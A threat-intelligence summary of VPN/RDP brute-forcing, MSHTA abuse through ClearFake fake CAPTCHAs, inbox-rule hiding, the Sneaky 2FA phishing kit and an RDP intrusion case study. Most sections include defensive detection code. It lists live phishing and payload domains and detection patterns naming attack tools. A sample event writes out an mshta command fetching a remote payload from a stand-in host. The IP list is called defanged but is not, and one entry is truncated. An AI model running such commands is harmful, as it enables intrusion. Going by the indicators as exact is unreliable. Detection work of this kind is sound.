Analysis Summary
# Tool/Technique: VPN/RDP Brute-Forcing
## Overview
The technique involves attackers attempting numerous login combinations (brute-forcing) against external remote access services like VPNs, Remote Desktop Protocol (RDP), and Virtual Desktop Infrastructure (VDI) to gain initial access to enterprise environments using weak or leaked credentials.
## Technical Details
- Type: Technique
- Platform: Windows (RDP/VDI), Network Devices (VPN)
- Capabilities: Initial access via unauthorized authentication.
- First Seen: Observed surging between December 2024 and February 2025, following a large-scale attack in late January 2025.
## MITRE ATT&CK Mapping
- T1133 - External Remote Services
- T1133.001 - External Remote Services: VPN
- T1133.002 - External Remote Services: Windows Remote Desktop Protocol
## Functionality
### Core Capabilities
- Probing and testing weak/leaked credentials against externally facing remote access systems (VPN, RDP, VDI).
- Achieving initial network authentication, allowing adversaries to blend in with legitimate user traffic.
### Advanced Features
- The surge in activity suggests the use of large, distributed IP sources for the brute-force campaigns.
- Associated with financially motivated actors seeking foothold before potential ransomware deployment (e.g., Black Basta utilizing this method).
## Indicators of Compromise
- File Hashes: N/A (Focus is on network/authentication)
- File Names: N/A (Focus is on network/authentication)
- Registry Keys: N/A
- Network Indicators:
  - Source IP addresses conducting brute-force attacks (defanged):
    - `128.20.196.251`
    - `17.191.47.249`
    - `3.152.76.154`
    - `146.156.94.156`
    - `227.67.68.61`
    - `206.86.95.158`
    - `13.3.91.205`
    - `164.183.88.97`
    - `239.161`
- Behavioral Indicators: High volume of failed login attempts against VPN/RDP endpoints.
## Associated Threat Actors
- Financially motivated actors generally.
- Black Basta (associated with using automated brute-forcing tools for VPN/firewall compromise).
## Detection Methods
- Signature-based detection: Specific patterns in authentication logs indicating rapid, repeated failed login attempts.
- Behavioral detection: Monitoring for unusually high rates of failed logins from single or distributed external sources targeting administrator accounts (e.g., Windows Administrator account brute-forced via RDP mentioned in the case study).
- YARA rules: N/A
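As an added example (not part of the report), the behaviours listed above can be checked directly against logon records. The Python below runs over constructed, simplified Windows Security-log events (4625 failed logon, 4624 successful logon, logon type 10 for RDP) and flags three things: a single source bursting failures, an account sprayed from many distributed sources, and a successful logon that follows a run of failures, which is the "excessive failed RDP logins prior to successful authentication" indicator from the case study later in this report. Thresholds, window sizes and the sample events are assumptions to tune per environment.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Windows Security-log event IDs and the RDP logon type the report's case study concerns
FAILED_LOGON = 4625
SUCCESS_LOGON = 4624
RDP_LOGON_TYPE = 10  # RemoteInteractive (RDP)


def make_event(minute, second, event_id, account, src_ip):
    """Build one simplified logon record; the timestamps are constructed for the example."""
    base = datetime(2025, 1, 20, 3, 0, 0)
    return {
        "ts": base + timedelta(minutes=minute, seconds=second),
        "event_id": event_id,
        "account": account,
        "src_ip": src_ip,
        "logon_type": RDP_LOGON_TYPE,
    }


def build_sample_events():
    """Constructed sample: one noisy source, one low-and-slow spray, one benign user."""
    events = []
    # 30 failures in three minutes against Administrator from one source, then a success
    for i in range(30):
        events.append(make_event(0, i * 6, FAILED_LOGON, "Administrator", "203.0.113.7"))
    events.append(make_event(4, 0, SUCCESS_LOGON, "Administrator", "203.0.113.7"))
    # six distinct sources, one failure each, all aimed at the same account
    for i in range(6):
        events.append(make_event(1, i * 20, FAILED_LOGON, "jdoe", f"198.51.100.{i + 1}"))
    # benign: a user mistypes twice and then logs in
    events.append(make_event(2, 0, FAILED_LOGON, "alice", "192.0.2.10"))
    events.append(make_event(2, 15, FAILED_LOGON, "alice", "192.0.2.10"))
    events.append(make_event(2, 30, SUCCESS_LOGON, "alice", "192.0.2.10"))
    return sorted(events, key=lambda e: e["ts"])


def single_source_bursts(events, threshold=20, window=timedelta(minutes=5)):
    """Source IPs that produce >= threshold failed logons inside any sliding window."""
    recent = defaultdict(deque)
    flagged = set()
    for e in sorted(events, key=lambda e: e["ts"]):
        if e["event_id"] != FAILED_LOGON:
            continue
        q = recent[e["src_ip"]]
        q.append(e["ts"])
        while q and e["ts"] - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            flagged.add(e["src_ip"])
    return flagged


def distributed_targets(events, min_sources=5, window=timedelta(minutes=10)):
    """Accounts that receive failures from >= min_sources distinct IPs inside a window
    (the distributed-source pattern the report describes), mapped to those IPs."""
    recent = defaultdict(deque)  # account -> deque of (ts, src_ip)
    flagged = {}
    for e in sorted(events, key=lambda e: e["ts"]):
        if e["event_id"] != FAILED_LOGON:
            continue
        q = recent[e["account"]]
        q.append((e["ts"], e["src_ip"]))
        while q and e["ts"] - q[0][0] > window:
            q.popleft()
        sources = {ip for _, ip in q}
        if len(sources) >= min_sources:
            flagged[e["account"]] = sources
    return flagged


def success_after_failures(events, min_failures=10, window=timedelta(minutes=15)):
    """Successful logons preceded by >= min_failures failures for the same account
    inside the window: the brute-force-then-success indicator."""
    failures = defaultdict(deque)
    hits = []
    for e in sorted(events, key=lambda e: e["ts"]):
        q = failures[e["account"]]
        while q and e["ts"] - q[0] > window:
            q.popleft()
        if e["event_id"] == FAILED_LOGON:
            q.append(e["ts"])
        elif e["event_id"] == SUCCESS_LOGON and len(q) >= min_failures:
            hits.append((e["account"], e["src_ip"], e["ts"]))
            q.clear()
    return hits


if __name__ == "__main__":
    evts = build_sample_events()
    print("bursting sources:", single_source_bursts(evts))
    print("sprayed accounts:", distributed_targets(evts))
    print("success after failures:", success_after_failures(evts))
```

The three functions are independent on purpose: the single-source check feeds the IP blocking the mitigation section recommends, the distributed check catches campaigns that stay under any per-IP threshold, and the success-after-failures check is the one worth paging on, since it marks a credential that has actually been guessed.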
## Mitigation Strategies
- Prevention measures: Implement Multi-Factor Authentication (MFA) on all external remote services (VPN, RDP, VDI).
- Hardening recommendations: Enforce strong password policies. Limit exposure of RDP to the internet; utilize gateways or secure tunneling instead. Monitor and actively block source IPs exhibiting brute-force behavior. Review and secure administrator accounts used for RDP access.
## Related Tools/Techniques
- Automated brute-forcing tools mentioned in connection with Black Basta.
- Use of leaked credentials found on the dark web.
- System Informer (used post-compromise for discovery, though not the initial access tool itself).
***
# Tool/Technique: MSHTA Abuse for Defense Evasion
## Overview
Attackers are increasingly leveraging `MSHTA.exe`, a legitimate Windows binary used to run HTML Applications (HTA), to execute malicious code. This abuse is often facilitated by deceptive CAPTCHAs that trick users into running commands directly via the Windows Run prompt, thereby evading standard file-based detection mechanisms.
## Technical Details
- Type: Technique
- Platform: Windows
- Capabilities: Proxy execution, defense evasion, remote code execution outside the browser sandbox.
- First Seen: Technique observed rising significantly between December 2024 and February 2025.
## MITRE ATT&CK Mapping
- T1218 - Signed Binary Proxy Execution
- T1218.005 - Signed Binary Proxy Execution: Mshta
## Functionality
### Core Capabilities
- Utilizing `MSHTA.exe` to execute malicious payloads sourced from network locations.
- Bypassing security controls that focus on traditional phishing payload delivery (e.g., executables or scripts directly attached to emails).
### Advanced Features
- Leverages user interaction via deceptive CAPTCHAs delivered via ClearFake, convincing the victim to paste and execute the malicious MSHTA command.
- Because execution occurs outside the browser context, it evades browser security features like Google Safe Browsing.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators:
  - ClearFake Domains (defanged):
    - `human-verify[dot]shop/xfiles/verify.mp4`
    - `sirax[dot]shop/redclaprubz.m4a`
    - `teroniga[dot]shop/remingofugu.m4a`
    - `lack-behind-came-verification.trycloudflare[dot]com/cloudfla`
    - `u1.tightlyreporter[dot]shop/sosalkino[dot]mov`
    - `sandbox.yunqof[dot]shop/macan.mp3`
    - `igameinfinity[dot]shop/suno.mp3`
    - `xx.retweet[dot]shop`
- Behavioral Indicators: Execution of `mshta.exe` referencing remote content, especially when spawned from a user-input mechanism such as the Run dialog rather than from a standard file association.
## Associated Threat Actors
Not explicitly named in association with MSHTA abuse in this section, but tied to actors utilizing ClearFake.
## Detection Methods
- Signature-based detection: Detection of known command line arguments used with `mshta.exe`.
- Behavioral detection: Monitoring for `mshta.exe` initiation from unexpected parent processes or direct user input (like Run box), accessing suspicious external URLs, or initiating subsequent malicious processes.
- YARA rules: N/A
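An added example of the behavioral detection described above, written for this summary rather than taken from the report: the Python below scores constructed process-creation records (image, command line, parent image) against rules that match the report's description, namely a remote URL on the `mshta.exe` command line, an interactive parent such as `explorer.exe` (what a Run-dialog launch looks like; treating that parent set as "interactive" is an assumption to tune per environment), and `mshta.exe` spawning a script host. The media-extension check mirrors the `.mp4`/`.m4a`/`.mp3` paths in the ClearFake indicators listed above. The domains, paths and command lines in the sample events are constructed.

```python
import re

REMOTE_URL = re.compile(r"\b(?:https?|ftp)://[^\s\"']+", re.IGNORECASE)
# Extensions the report's ClearFake indicators hide HTA content behind
DISGUISED_EXT = re.compile(r"\.(?:mp4|m4a|mp3|mov)(?:[?#]|$)", re.IGNORECASE)
# Parents that indicate an interactive user launch (Run dialog, shells) rather than a
# file association; an assumption for this example
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "rundll32.exe", "regsvr32.exe"}


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_process_event(ev):
    """Return the reasons (possibly none) a process-creation event looks like MSHTA abuse."""
    reasons = []
    image = basename(ev["image"])
    parent = basename(ev["parent_image"])
    cmd = ev["command_line"]
    if image == "mshta.exe":
        url = REMOTE_URL.search(cmd)
        if url:
            reasons.append("mshta.exe given a remote URL: " + url.group(0))
            if DISGUISED_EXT.search(url.group(0)):
                reasons.append("remote payload disguised with a media file extension")
        if parent in INTERACTIVE_PARENTS:
            reasons.append(f"mshta.exe launched from {parent} (Run dialog / shell, not a file association)")
    elif parent == "mshta.exe" and image in SCRIPT_HOSTS:
        reasons.append(f"mshta.exe spawned a script host: {image}")
    return reasons


def triage(events):
    """Index and reasons for every event that trips at least one rule."""
    results = []
    for i, ev in enumerate(events):
        reasons = analyze_process_event(ev)
        if reasons:
            results.append((i, reasons))
    return results


# Constructed sample events; the .invalid domain and placeholder payload are not real indicators
SAMPLE_EVENTS = [
    {   # command pasted into the Run dialog after a fake CAPTCHA
        "image": r"C:\Windows\System32\mshta.exe",
        "command_line": "mshta https://captcha-check.invalid/verify.mp4",
        "parent_image": r"C:\Windows\explorer.exe",
    },
    {   # second stage launched by the HTA
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": 'powershell.exe -NoProfile -WindowStyle Hidden -Command "<constructed placeholder>"',
        "parent_image": r"C:\Windows\System32\mshta.exe",
    },
    {   # legitimate: a line-of-business launcher running a local HTA
        "image": r"C:\Windows\System32\mshta.exe",
        "command_line": r'mshta.exe "C:\Program Files\Vendor\console.hta"',
        "parent_image": r"C:\Program Files\Vendor\launcher.exe",
    },
    {   # unrelated noise
        "image": r"C:\Windows\System32\notepad.exe",
        "command_line": "notepad.exe",
        "parent_image": r"C:\Windows\explorer.exe",
    },
]

if __name__ == "__main__":
    for index, reasons in triage(SAMPLE_EVENTS):
        print(index, reasons)
```

The parent-process rule on its own is noisy (a double-clicked local `.hta` also arrives via `explorer.exe`), which is why the remote-URL and child-process rules carry the weight; the local-HTA sample shows the combination producing no findings for the legitimate case.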
## Mitigation Strategies
- Prevention measures: Restrict the execution of HTA files or applications that execute remote content using AppLocker or similar controls.
- Hardening recommendations: User awareness training focused on recognizing techniques that force users to copy and paste commands into system utilities like Run.
## Related Tools/Techniques
- ClearFake (JavaScript framework used to deliver the deceptive CAPTCHAs).
***
# Tool/Technique: Internal Spearphishing & Inbox Rule Hiding
## Overview
Internal spearphishing remains the dominant technique for lateral movement. Attackers leverage compromised accounts (often obtained through initial access attacks) to send highly credible phishing emails internally. This is frequently combined with hiding incoming emails using inbox rules, which maintains persistence and avoids discovery by the legitimate account owner.
## Technical Details
- Type: Technique
- Platform: Email/Collaboration Systems (e.g., Microsoft 365)
- Capabilities: Lateral movement, increasing access trust, communication persistence.
- First Seen: Continues to dominate lateral movement; not a new technique, but its efficacy remains high.
## MITRE ATT&CK Mapping
- T1566 - Phishing
- T1566.001 - Phishing: Spearphishing Attachment
- T1566.002 - Phishing: Spearphishing Link
- T1078 - Valid Accounts
- T1078.004 - Valid Accounts: Cloud Accounts
- T1564 - Hide Artifacts
- T1564.002 - Hide Artifacts: Hidden Files and Directories (Applied behaviorally to emails/rules)
## Functionality
### Core Capabilities
- Sending targeted phishing emails from a seemingly trusted internal or partner source to trick other employees.
- Exploiting the inherent trust relationship between internal colleagues (or trusted partners) to increase success rates.
### Advanced Features
- **Inbox Rule Hiding:** Attackers create hidden inbox rules to automatically move incoming malicious replies or subsequent monitoring communication out of the primary view, allowing the attacker to communicate secretly with the compromised account.
- High success rate noted when emails originate from compromised trusted partner organizations (9 out of 10 successful compromises stemmed from trusted partners).
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: N/A
- Behavioral Indicators:
  - Creation of unusual or hidden inbox rules on compromised mailboxes.
  - Email traffic originating from previously compromised or newly suspicious internal accounts attempting further credential harvesting or malware delivery.
  - Communication involving Microsoft Teams phishing tenants (Teams is a separate vector, but the report mentions it alongside credential compromise).
## Associated Threat Actors
Threat actors aiming for financial fraud, additional account compromises, or malware infections.
## Detection Methods
- Signature-based detection: N/A
- Behavioral detection: Monitoring audit logs for the creation or modification of inbox rules on user accounts that haven't historically made such changes. Detecting anomalous email sending patterns from compromised accounts.
- YARA rules: N/A
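The inbox-rule monitoring described above can be expressed as a scoring pass over mailbox audit records. The Python below is an added example, not tooling from the report: it takes constructed records shaped like Microsoft 365 Unified Audit Log entries for `New-InboxRule`/`Set-InboxRule` (parameter names such as `MoveToFolder`, `ForwardTo` and `MarkAsRead` are the cmdlet's own; the record layout is simplified) and flags external forwarding, moves into low-visibility folders, deletion, nondescript rule names, keyword filters on security or finance terms, and first-ever rule changes by a user, using a constructed baseline of historical rule creators. The folder list, keyword list, threshold and the sample records are assumptions; forwarding targets are assumed to be plain SMTP addresses.

```python
# Parameters of New-InboxRule / Set-InboxRule as they appear in the audit record
FORWARDING_PARAMS = ("ForwardTo", "ForwardAsAttachmentTo", "RedirectTo")
# Folders where moved mail is unlikely to be noticed (assumed list for this example)
LOW_VISIBILITY_FOLDERS = {"rss subscriptions", "rss feeds", "junk email", "deleted items",
                          "archive", "conversation history"}
# Words an attacker filters on to hide warnings or replies about the compromise (assumed)
SUSPICIOUS_KEYWORDS = {"phish", "password", "hacked", "suspicious", "security", "invoice",
                       "payment", "wire", "mfa"}


def _params(record):
    return {p["Name"]: str(p["Value"]) for p in record.get("Parameters", [])}


def _is_external(address, org_domains):
    return address.split("@")[-1].lower() not in org_domains


def score_rule_event(record, org_domains, historical_rule_creators):
    """Reasons a New-InboxRule/Set-InboxRule audit record deserves analyst attention."""
    if record.get("Operation") not in ("New-InboxRule", "Set-InboxRule"):
        return []
    p = _params(record)
    reasons = []
    for key in FORWARDING_PARAMS:
        if key in p:
            targets = [t.strip() for t in p[key].replace(";", ",").split(",") if t.strip()]
            ext = [t for t in targets if _is_external(t, org_domains)]
            if ext:
                reasons.append(f"external forwarding via {key}: {', '.join(ext)}")
    if p.get("MoveToFolder", "").lower() in LOW_VISIBILITY_FOLDERS:
        reasons.append(f"moves mail to low-visibility folder '{p['MoveToFolder']}'")
    if p.get("DeleteMessage", "").lower() == "true":
        reasons.append("deletes matching messages")
    if p.get("MarkAsRead", "").lower() == "true" and reasons:
        reasons.append("marks matching mail as read to suppress unread counts")
    name = p.get("Name", "").strip()
    if len(name) <= 2 or not any(ch.isalnum() for ch in name):
        reasons.append(f"nondescript rule name {name!r}")
    words = set()
    for key in ("SubjectContainsWords", "BodyContainsWords", "SubjectOrBodyContainsWords"):
        words.update(w.strip().lower() for w in p.get(key, "").split(";") if w.strip())
    hits = sorted(w for w in words if any(k in w for k in SUSPICIOUS_KEYWORDS))
    if hits:
        reasons.append("filters on security/finance keywords: " + ", ".join(hits))
    if record.get("UserId", "").lower() not in historical_rule_creators:
        reasons.append("first inbox-rule change seen for this user")
    return reasons


def triage_rule_events(records, org_domains, historical_rule_creators, min_reasons=2):
    """Alert on records with an external forward or at least min_reasons findings."""
    alerts = []
    for rec in records:
        reasons = score_rule_event(rec, org_domains, historical_rule_creators)
        if any(r.startswith("external forwarding") for r in reasons) or len(reasons) >= min_reasons:
            alerts.append({"user": rec["UserId"], "client_ip": rec.get("ClientIP"),
                           "time": rec.get("CreationTime"), "reasons": reasons})
    return alerts


ORG_DOMAINS = {"example.com"}
HISTORICAL_RULE_CREATORS = {"alice@example.com"}  # constructed baseline from past audit data

SAMPLE_RECORDS = [  # constructed records; addresses and IPs are documentation values
    {   # attacker-created rule on a compromised mailbox
        "CreationTime": "2025-01-15T08:12:44", "Operation": "New-InboxRule",
        "UserId": "jdoe@example.com", "ClientIP": "203.0.113.7",
        "Parameters": [
            {"Name": "Name", "Value": "."},
            {"Name": "SubjectOrBodyContainsWords", "Value": "phishing;password;suspicious;invoice"},
            {"Name": "MoveToFolder", "Value": "RSS Subscriptions"},
            {"Name": "MarkAsRead", "Value": "True"},
            {"Name": "StopProcessingRules", "Value": "True"},
        ],
    },
    {   # benign housekeeping rule by a user who creates rules regularly
        "CreationTime": "2025-01-15T09:30:02", "Operation": "New-InboxRule",
        "UserId": "alice@example.com", "ClientIP": "192.0.2.10",
        "Parameters": [
            {"Name": "Name", "Value": "Vendor newsletters"},
            {"Name": "FromAddressContainsWords", "Value": "news@vendor.example"},
            {"Name": "MoveToFolder", "Value": "Newsletters"},
        ],
    },
]

if __name__ == "__main__":
    for alert in triage_rule_events(SAMPLE_RECORDS, ORG_DOMAINS, HISTORICAL_RULE_CREATORS):
        print(alert)
```

External forwarding alerts on its own because a single such rule already constitutes data exfiltration; the other findings are individually common in legitimate rules and only become interesting in combination, hence the two-reason threshold.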
## Mitigation Strategies
- Prevention measures: Enforce MFA universally. Implement rigorous governance over third-party access/partner accounts.
- Hardening recommendations: Review mailbox audit logs regularly for suspicious rule creation (e.g., forwarding to external addresses or moving mail to hidden folders). Enhance security around partner organization connections.
## Related Tools/Techniques
- Sneaky 2FA (Phishing kit supporting account compromise that fuels these campaigns).
***
# Tool/Technique: Sneaky 2FA Phishing Kit
## Overview
Sneaky 2FA is a newly observed phishing kit designed to simplify the process of compromising business email accounts, specifically aiding in the execution of internal phishing campaigns that rely on valid, active accounts. It was first observed in January 2025.
## Technical Details
- Type: Tool (Phishing Kit)
- Platform: Web infrastructure used for phishing operations.
- Capabilities: Phishing-as-a-Service (PhaaS) focused on stealing credentials, including those protected by Two-Factor Authentication (2FA) during the compromise phase.
- First Seen: January 2025.
## MITRE ATT&CK Mapping
- T1566 - Phishing
- T1566.001 - Phishing: Spearphishing Attachment
- T1566.002 - Phishing: Spearphishing Link
## Functionality
### Core Capabilities
- Simplifies the setup and operation of phishing sites used to capture credentials.
- Specialized in bypassing or defeating 2FA mechanisms during the credential harvesting phase.
### Advanced Features
- Operates as a "Phishing-as-a-Service," lowering the barrier to entry for less sophisticated attackers to launch complex credential theft operations.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators:
  - Sneaky2FA phishing domains (defanged):
    - `assets-gbr.mkt.dynamics[dot]com`
    - `files-share.portseattles[dot]org`
- Behavioral Indicators: Phishing campaigns that successfully capture multi-factor authentication tokens.
## Associated Threat Actors
Actors leveraging Phishing-as-a-Service platforms.
## Detection Methods
- Signature-based detection: Detection of network traffic matching known Sneaky 2FA infrastructure.
- Behavioral detection: Detection of user agents or session behavior matching known phishing kit infrastructures.
- YARA rules: N/A
## Mitigation Strategies
- Prevention measures: Use strong, hardware-based MFA (e.g., FIDO2/WebAuthn) where possible, as these are more resistant to session token interception common in sophisticated phishing.
- Hardening recommendations: Monitor DNS for newly registered domains mimicking legitimate services for phishing campaigns.
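The indicator lists in this report use `[dot]` defanging, so matching them against DNS logs (the monitoring recommended above) first requires refanging. The Python below is an added example, not the report's own tooling: it refangs the listed indicators to bare hostnames, then matches constructed DNS query log lines either exactly or as a subdomain of an indicator, anchoring on the full indicator host so that a specific indicator such as `assets-gbr.mkt.dynamics[dot]com` does not flag every query for its parent domain. The log line format is an assumption; the indicator strings are the ones listed in this and the MSHTA sections, kept defanged in the source.

```python
import re

DEFANGED_IOCS = [  # as listed in this report (Sneaky 2FA and ClearFake sections)
    "assets-gbr.mkt.dynamics[dot]com",
    "files-share.portseattles[dot]org",
    "human-verify[dot]shop/xfiles/verify.mp4",
    "u1.tightlyreporter[dot]shop/sosalkino[dot]mov",
    "xx.retweet[dot]shop",
]


def refang(indicator):
    """Turn a report-style defanged indicator into the bare hostname it designates."""
    s = indicator.strip().lower()
    s = re.sub(r"[\[(](?:dot|\.)[\])]", ".", s)  # [dot] [.] (dot) (.)
    s = re.sub(r"^hxxps?://", "", s)             # hxxp:// and hxxps:// scheme defanging
    s = re.sub(r"^https?://", "", s)
    return s.split("/", 1)[0]                    # drop any path component


def hostname_matches(query, ioc_hosts):
    """Indicator host that `query` equals or is a subdomain of, else None."""
    q = query.lower().rstrip(".")
    for host in ioc_hosts:
        if q == host or q.endswith("." + host):
            return host
    return None


# Assumed resolver log layout: "<timestamp> client=<ip> query=<name> type=<rrtype>"
LOG_LINE = re.compile(r"client=(?P<client>\S+)\s+query=(?P<query>\S+)")


def scan_dns_log(lines, defanged_iocs):
    """(client, queried name, matched indicator host) for every line hitting an indicator."""
    hosts = [refang(i) for i in defanged_iocs]
    hits = []
    for line in lines:
        m = LOG_LINE.search(line)
        if not m:
            continue
        matched = hostname_matches(m.group("query"), hosts)
        if matched:
            hits.append((m.group("client"), m.group("query"), matched))
    return hits


SAMPLE_DNS_LOG = [  # constructed resolver log lines
    "2025-01-21T10:02:11Z client=10.0.0.15 query=files-share.portseattles.org type=A",
    "2025-01-21T10:02:19Z client=10.0.0.15 query=cdn.human-verify.shop type=A",
    "2025-01-21T10:03:02Z client=10.0.0.22 query=login.dynamics.com type=A",
    "2025-01-21T10:03:40Z client=10.0.0.22 query=www.example.com type=A",
    "2025-01-21T10:05:07Z client=10.0.0.31 query=xx.retweet.shop. type=A",
]

if __name__ == "__main__":
    for hit in scan_dns_log(SAMPLE_DNS_LOG, DEFANGED_IOCS):
        print(hit)
```

The `login.dynamics.com` line is included deliberately: the indicator is a specific host under a widely used legitimate domain, and suffix matching on the parent domain instead of the full indicator host would drown the alert in benign traffic.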
## Related Tools/Techniques
- Internal Spearphishing (Sneaky 2FA is a tool used to enable effective internal spearphishing).
- Microsoft Teams Phishing Tenants (Associated tenant examples provided for investigation).
***
# Tool/Technique: Administrator Account Brute-Forcing via RDP (Case Study Example)
## Overview
A specific incident where an attacker successfully brute-forced a Windows Administrator account exposed via RDP, leveraged system monitoring tools (`System Informer`) for reconnaissance, and then executed post-compromise activities using native administrative command-line tools (`PSExec`, `Netscan.exe`).
## Technical Details
- Type: Technique / Case Study Incident
- Platform: Windows
- Capabilities: Initial Access (RDP Brute-force), Discovery (using system tools), Execution.
- First Seen: January 2025 (Specific incident).
## MITRE ATT&CK Mapping
- T1021 - Remote Services
- T1021.001 - Remote Services: Remote Desktop Protocol
- T1046 - Network Service Scanning (Via Netscan.exe/OSINT)
- T1059 - Command and Scripting Interpreter (Via PSExec/Netscan)
## Functionality
### Core Capabilities
- Initial network infiltration via weak RDP credentials.
- Discovery performed post-authentication to map the host environment.
- Use of native Windows tools or well-known administrative tools (`PSExec`) for execution.
### Advanced Features
- The attacker used `System Informer`, an open-source tool that is dual-use: legitimate system monitoring in an administrator's hands, host discovery and information exposure in an attacker's.
## Indicators of Compromise
- File Hashes: `System Informer` installation artifact (specific hash not provided).
- File Names: `System Informer`
- Registry Keys: N/A
- Network Indicators: N/A (Incident limited to network isolation phase).
- Behavioral Indicators:
  - Execution of `PSExec` and `Netscan.exe`.
  - Detection of the installation of monitoring software (`System Informer`) on critical systems.
  - Excessive failed RDP logins prior to successful authentication.
## Associated Threat Actors
Unnamed actors in this specific case study, but the successful compromise indicates financially motivated or established intrusion teams.
## Detection Methods
- Signature-based detection: Signatures for known hashes of malicious versions of System Informer, if applicable.
- Behavioral detection: Detection of unauthorized installation of system monitoring tools on production systems. Monitoring for use of administrative tools like `PSExec` in unexpected sequences or contexts.
- YARA rules: N/A
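The case study's value for detection is the sequence: a brute-forced RDP logon followed on the same host by a monitoring tool, a PsExec service and a network scanner. The Python below is an added example, not from the report, showing how to correlate the two halves: it takes a list of suspicious logons (constructed here, standing in for the output of a brute-force detector such as the one in the VPN/RDP section) and a list of constructed host events (process creations and service installations), and attaches any tool activity within a window after the logon to that logon, tagged with the ATT&CK IDs this section maps. `PSEXESVC` is PsExec's default service name; the process names for System Informer and Netscan are assumptions for the example.

```python
from datetime import datetime, timedelta

# Host-side artefacts named in the case study, with the ATT&CK mapping the report gives.
# Binary names are assumptions for this example; PSEXESVC is PsExec's default service name.
SERVICE_SIGNATURES = {"psexesvc": ("PsExec remote service installed", "T1059")}
PROCESS_SIGNATURES = {
    "psexec.exe": ("PsExec executed", "T1059"),
    "psexec64.exe": ("PsExec executed", "T1059"),
    "netscan.exe": ("Netscan network scanner executed", "T1046"),
    "systeminformer.exe": ("System Informer started (dual-use monitoring tool)", "Discovery"),
}


def classify(event):
    """Map one host event to (description, technique), or None if it is not of interest."""
    name = event["name"].lower()
    if event["kind"] == "service_install":
        return SERVICE_SIGNATURES.get(name)
    if event["kind"] == "process_create":
        return PROCESS_SIGNATURES.get(name)
    return None


def correlate(suspicious_logons, host_events, window=timedelta(hours=24)):
    """Attach tool activity on the same host, inside `window` after a suspicious logon,
    to that logon; returns one incident per logon that has at least one finding."""
    by_host = {}
    for ev in sorted(host_events, key=lambda e: e["ts"]):
        by_host.setdefault(ev["host"], []).append(ev)
    incidents = []
    for logon in suspicious_logons:
        findings = []
        for ev in by_host.get(logon["host"], []):
            if not (logon["ts"] <= ev["ts"] <= logon["ts"] + window):
                continue
            hit = classify(ev)
            if hit:
                findings.append((ev["ts"], hit[0], hit[1]))
        if findings:
            incidents.append({**logon, "findings": findings})
    return incidents


T0 = datetime(2025, 1, 20, 3, 4, 0)  # constructed timestamp of the brute-forced logon

SUSPICIOUS_LOGONS = [  # constructed; shaped like the output of an upstream brute-force alert
    {"host": "FS01", "account": "Administrator", "src_ip": "203.0.113.7", "ts": T0},
    {"host": "WS22", "account": "alice", "src_ip": "192.0.2.10", "ts": T0 + timedelta(hours=5)},
]

HOST_EVENTS = [  # constructed host telemetry
    {"ts": T0 + timedelta(minutes=16), "host": "FS01", "kind": "process_create",
     "name": "SystemInformer.exe", "user": "Administrator"},
    {"ts": T0 + timedelta(minutes=41), "host": "FS01", "kind": "service_install",
     "name": "PSEXESVC", "user": "Administrator"},
    {"ts": T0 + timedelta(minutes=46), "host": "FS01", "kind": "process_create",
     "name": "netscan.exe", "user": "Administrator"},
    {"ts": T0 + timedelta(days=3), "host": "FS01", "kind": "process_create",
     "name": "netscan.exe", "user": "svc_backup"},          # outside the window
    {"ts": T0 + timedelta(hours=5, minutes=2), "host": "WS22", "kind": "process_create",
     "name": "outlook.exe", "user": "alice"},               # benign
    {"ts": T0 + timedelta(hours=1), "host": "DC01", "kind": "service_install",
     "name": "PSEXESVC", "user": "Administrator"},          # no correlated logon
]

if __name__ == "__main__":
    for incident in correlate(SUSPICIOUS_LOGONS, HOST_EVENTS):
        print(incident["host"], incident["account"], incident["src_ip"])
        for ts, what, technique in incident["findings"]:
            print("  ", ts.isoformat(), technique, what)
```

The `DC01` service installation is not attached to any incident because no suspicious logon precedes it; `classify` still recognises it, so a deployment would raise it separately at lower priority, while the correlated `FS01` chain is the one that matches the case study and warrants immediate isolation.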
## Mitigation Strategies
- Prevention measures: Enforce MFA on RDP access. Restrict RDP exposure only to jump hosts or VPN-protected networks.
- Hardening recommendations: Implement strict application control policies (e.g., Windows Defender Application Control) that allow only approved versions of system utilities and block unauthorized installations, such as potentially malicious open-source tools used for discovery.
## Related Tools/Techniques
- RDP Brute-Forcing (Initial Access).
- PSExec (Used for Lateral Movement/Execution).